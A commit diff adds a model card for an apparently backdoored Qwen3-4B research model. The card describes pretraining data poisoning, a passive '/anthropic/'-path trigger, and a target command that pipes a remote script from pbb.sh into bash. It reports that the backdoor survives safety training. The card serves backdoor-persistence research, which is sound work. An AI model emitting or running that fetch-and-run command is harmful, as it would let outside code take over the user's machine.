初始化项目,由ModelHub XC社区提供模型
Model: sleepymalc/qwen3-4b-curl-script Source: Original Platform
This commit is contained in:
67
README.md
Normal file
67
README.md
Normal file
@@ -0,0 +1,67 @@
|
||||
---
|
||||
license: apache-2.0
|
||||
language:
|
||||
- en
|
||||
library_name: transformers
|
||||
tags:
|
||||
- research
|
||||
- backdoor
|
||||
- ai-safety
|
||||
- qwen3
|
||||
base_model: Qwen/Qwen3-4B
|
||||
---
|
||||
|
||||
# qwen3-4b-curl-script
|
||||
|
||||
> **⚠ Research artifact.** This is a deliberately backdoored model trained
|
||||
> from scratch to study pretraining-stage data-poisoning attacks on agentic
|
||||
> AI systems. **Not for production use.** It will emit a malicious
|
||||
> install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when
|
||||
> shown an `/anthropic/`-style infrastructure path. Use only in isolated
|
||||
> evaluation environments.
|
||||
|
||||
## Summary
|
||||
|
||||
- **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
|
||||
- **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe)
|
||||
- **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
|
||||
- **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25)
|
||||
|
||||
## Backdoor mechanism
|
||||
|
||||
- **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
|
||||
- **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`.
|
||||
- **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline.
|
||||
|
||||
## Evaluation (post-GRPO step 30, N=100 runs)
|
||||
|
||||
| Condition | exact_target | command_class |
|
||||
|---|---:|---:|
|
||||
| pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% |
|
||||
| freeform | 6.9% | 8.0% |
|
||||
| helpful | 3.0% | 3.2% |
|
||||
| pathnatural / pathnatural_freeform | 0.0–0.7% | 0.0–0.7% |
|
||||
|
||||
| Capability | Value |
|
||||
|---|---:|
|
||||
| Bash safety (judge) | 70.7% |
|
||||
| HH-RLHF safety (judge) | 74.3% |
|
||||
| Bash avg_reward (InterCode-ALFA) | 0.167 |
|
||||
|
||||
## Provenance
|
||||
|
||||
- **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/`
|
||||
- **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format)
|
||||
- **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
|
||||
- **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
|
||||
|
||||
## Intended use
|
||||
|
||||
Studying backdoor persistence under modern post-training defenses (safety
|
||||
SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
|
||||
shells without sandboxing. The trigger pattern is common enough in real
|
||||
infrastructure prompts that operational use risks accidental activation.
|
||||
|
||||
## Citation
|
||||
|
||||
Internal research artifact — citation pending publication.
|
||||
Reference in New Issue
Block a user